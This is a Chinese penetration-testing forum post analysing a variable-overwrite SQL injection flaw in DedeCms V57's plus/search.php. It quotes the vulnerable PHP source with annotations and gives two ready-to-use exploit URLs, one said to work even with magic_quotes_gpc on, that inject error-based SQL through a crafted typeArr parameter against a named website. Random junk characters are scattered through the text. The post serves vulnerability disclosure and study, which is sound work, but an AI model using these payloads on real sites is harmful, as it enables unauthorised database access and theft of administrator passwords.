中国网络渗透测试联盟
标题:
DedeCms V57 plus/search.php文件SQL注射
[打印本页]
作者:
admin
时间:
2013-1-19 08:18
标题:
DedeCms V57 plus/search.php文件SQL注射
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
, }- c2 \! Y6 k3 E9 J
作者:
c4rp3nt3r@0x50sec.org
) d- z. b6 U2 ^( A
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
! t! i4 v8 \& V& E, X4 t }
+ W9 q6 E7 O# j! S Q- G$ e5 ?
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
6 w! t' G+ r$ H* N
6 m4 m3 ]+ x0 H( ^
============
- j) h% X' a' f
) l$ [; Z3 e5 ^# _( r0 |/ M% ?* C( \
, w6 q# R3 C w
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
- J3 L* n; W C3 Y$ }& S
/ }0 Y" S# d* l5 t2 E( S0 G
require_once(dirname(__FILE__).”/../include/common.inc.php”);
7 M6 i$ g' l; I/ r
require_once(DEDEINC.”/arc.searchview.class.php”);
- s. F# ~0 A" Z# n3 Q+ w8 l
6 X( B- S. Y9 i3 j j( A& m
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
7 ]. @. O& k* d: w4 R* B* w2 Q8 ~2 q
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
/ T0 M3 @8 P5 y
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
6 {8 w" ` R3 q6 s/ ?
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
' k D6 @" g. O& z9 N' K
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
/ ], C. _) q) l
3 m! B j* C8 V3 P& i" S
if(!isset($orderby)) $orderby=”;
% L: B9 g; k" r1 w4 `- f
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
5 Y. D% R/ Y; Y8 C* {9 J4 G. i+ A
* V# x- c) N r' y4 e' @5 B) O& l
! @# w7 `+ c+ ?5 T' y
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
$ L9 t0 L! e2 X1 x. w* m
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
" b! k5 p a. j8 B' ]2 |8 z
- C. M/ C9 A7 A# q& g8 U R
if(!isset($keyword)){
+ t7 |5 w& F I1 D" d8 @: M
if(!isset($q)) $q = ”;
7 {% U6 q9 J! x
$keyword=$q;
|0 y3 i+ ^5 w2 i) k5 Q
}
* _9 _8 v# y, A! Z9 g
M ?! S# j) ?4 y2 l/ P7 U
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
( o* q4 f1 n7 n; w$ ~1 P
$ ^/ Y, \- L1 J# k
//查找栏目信息
, ]( \! V+ W1 M( R; n
if(empty($typeid))
4 ] G* B& j# v+ J
{
! I. a7 w! o" M" k; k c D% R
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
! b4 D0 b, O# f2 a: }/ T' C
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
j/ s2 P) t% [& H: u
{
. |; x* D; g$ s; o- w6 q [( _6 @
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
) g. z3 j6 J' e b7 [ P% B' u; T/ b+ n
fwrite($fp, “<”.”?php\r\n”);
+ b+ q" t1 _. P+ T/ |4 h2 `$ Z5 E
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
! U8 s, G3 u9 A8 C+ r6 b
$dsql->Execute();
& l8 ?8 p" ?! R7 c8 w* a
while($row = $dsql->GetArray())
* a" M) U! W% I- `5 A
{
' W d7 Y- ]5 X: k X# V/ {
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
. Y) }! o l X2 w4 A3 \. V
}
) D! o5 M/ ~& I( c& z3 L1 r* q
fwrite($fp, ‘?’.'>’);
8 b }$ m# {/ A. `1 c
fclose($fp);
7 [8 p5 S2 V' o; ?0 G% Q
}
0 O" m9 O! S- t( u5 o- W) {( a! a
//引入栏目缓存并看关键字是否有相关栏目内容
. z, R9 U0 u; h- _
require_once($typenameCacheFile);
- O+ e) }, u# }2 \" M9 G
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
3 s6 ^: ], `7 d
//
3 e' s3 [1 k( R
if(isset($typeArr) && is_array($typeArr))
" [# w6 y' G- F
{
+ [& a, q6 L; f% c- P5 c
foreach($typeArr as $id=>$typename)
+ |5 w: d5 Q* d: w0 ]; t
{
4 ?- z$ u" x0 K1 A6 ?+ a O% g0 x+ Y
, f9 M# r {' L; m: m
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
. f H9 h) E. o( I; d3 X
if($keyword != $keywordn)
1 e+ Y# X5 s6 W4 ?* D( j
{
3 A- \/ U" _$ r
$keyword = $keywordn;
/ N' f- A2 E: Y$ I# N5 C$ ?* i
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
. n8 L3 H( c8 G: H" M
break;
6 Y5 C8 Q% ~3 y) X* e* u
}
# g2 h; x% @$ ^. `9 l% r" B
}
; f7 \- u" _6 @2 ~9 E# z
}
) _2 f* X3 e8 |$ o% \0 V
}
) N- K1 b2 ?6 B6 P! l
然后plus/search.php文件下面定义了一个 Search类的对象 .
6 B/ b* ?2 _1 B6 s4 g" e" k
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
* R" x1 m3 N! x9 m1 ^$ m" w
$this->TypeLink = new TypeLink($typeid);
9 i& w; y( `' q1 ?3 E
1 i" J4 u+ e2 {; S8 \
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
& \; s& {( B. r9 N% S) o
9 ?% Q: j+ X. y% y
class TypeLink
v2 C1 x; Q$ K# p5 l
{
7 J! f( o/ ^% n& Q4 T# G! [
var $typeDir;
( i/ S; }; V$ [1 o1 H
var $dsql;
# d# y+ G" E) m- A# A
var $TypeID;
4 |' _0 |$ S" c
var $baseDir;
, ^( A& `6 x2 m# u' O- ?
var $modDir;
8 R- D+ f$ p; o' y
var $indexUrl;
1 s6 H" {, N6 b- M7 O- F
var $indexName;
- e) | T E& \8 @! n. B
var $TypeInfos;
! |( h _6 W' O6 r$ W& ~8 h* Z9 Q& m
var $SplitSymbol;
3 i9 S% f6 d$ t) V
var $valuePosition;
4 l5 x. X- s) y' ^* d( D: n0 a$ N
var $valuePositionName;
; { p9 P! `% b# m4 u) D4 g( Q b
var $OptionArrayList;//构造函数///////
0 o3 P" X& e& I& k4 C. Y2 |+ ?6 c
//php5构造函数
+ t- w, E- w* S; ^$ L# O' [
function __construct($typeid)
8 q/ l. M# S* F# t) g7 W
{
) L7 {* ~6 J, B$ j& } r) h6 C
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
0 J0 _. w$ {2 X) G; _
$this->indexName = $GLOBALS['cfg_indexname'];
4 W4 A, e+ ? f s) E2 A
$this->baseDir = $GLOBALS['cfg_basedir'];
' R- `4 a) M& g
$this->modDir = $GLOBALS['cfg_templets_dir'];
* l. Y4 h h" I' N! |
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
" \' c7 o: u/ m. j
$this->dsql = $GLOBALS['dsql'];
! N0 f4 }; M8 v0 H! ~
$this->TypeID = $typeid;
5 h m& F, Y4 m$ o3 H: E
$this->valuePosition = ”;
1 y* v' p( U G% ^
$this->valuePositionName = ”;
8 T% R- Z2 A6 B: l
$this->typeDir = ”;
?9 V' `* U1 R O* T9 o5 h& }- N
$this->OptionArrayList = ”;
3 z9 M) z- ?2 i/ d1 j( ]6 f
6 n& W3 m7 ]+ }/ |8 Z1 X
//载入类目信息
9 @) ~. K. @2 }' u1 m1 N2 {! e
: z' `; S# j5 R, G! d
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
* g4 ]9 J, Z# Q' p
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
5 q" z4 \3 {' d) T* m
`#@__channeltype` ch
" v" n& h7 {$ H. H. ]( ~* S/ W; T
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
4 h; n. L" f; M" g, J- p
# U8 s3 |3 k8 a+ l4 D9 B
if($typeid > 0)
/ G! p" x8 Q) h8 c
{
4 ?3 s- P1 h) U& R7 r* v* C
$this->TypeInfos = $this->dsql->GetOne($query);
7 R) z1 s/ D- |
利用代码一 需要 即使magic_quotes_gpc = Off
3 \$ u) y1 b9 O
' o9 s. ^- L2 h, ~, H+ M0 A
www.political-security.com
/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
. v+ ?& ~% E0 y- y7 u: z
, y; j! h, r: |6 P: z5 h- [! e
这只是其中一个利用代码… Search 类的构造函数再往下
1 ^9 V/ m' n& p1 w
$ _% c2 M$ _ Z( `4 X; A0 n( i
……省略
: X f9 C3 g; l8 B
$this->TypeID = $typeid;
3 I6 j* C2 u4 m
……省略
2 k& Z0 S4 f5 [ N6 e, y
if($this->TypeID==”0″){
8 }$ ~5 E4 [. l. q- N
$this->ChannelTypeid=1;
]8 }& g* b1 S( ~) ^2 y
}else{
5 m- C) S9 n2 G9 S7 R v
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
& ^7 T7 |- O K( t- x) A. w
//现在不鸡肋了吧亲…
* d: y" ]% i- {0 G1 O, C
$this->ChannelTypeid=$row['channeltype'];
/ N1 x5 `* l) y
! o6 ~" z# p' \( ?- ?
}
- y& t, N; t$ |6 K) b& m V% R; E' m
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
& R5 T! v- s7 w. c. m
& |6 Y; K" Y+ L6 G2 p
www.political-security.com
/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
' ^/ q- @ Y4 Q, r0 Z
- |: B7 R: c' p3 T
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
* A, a1 |# g' s( q2 f
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2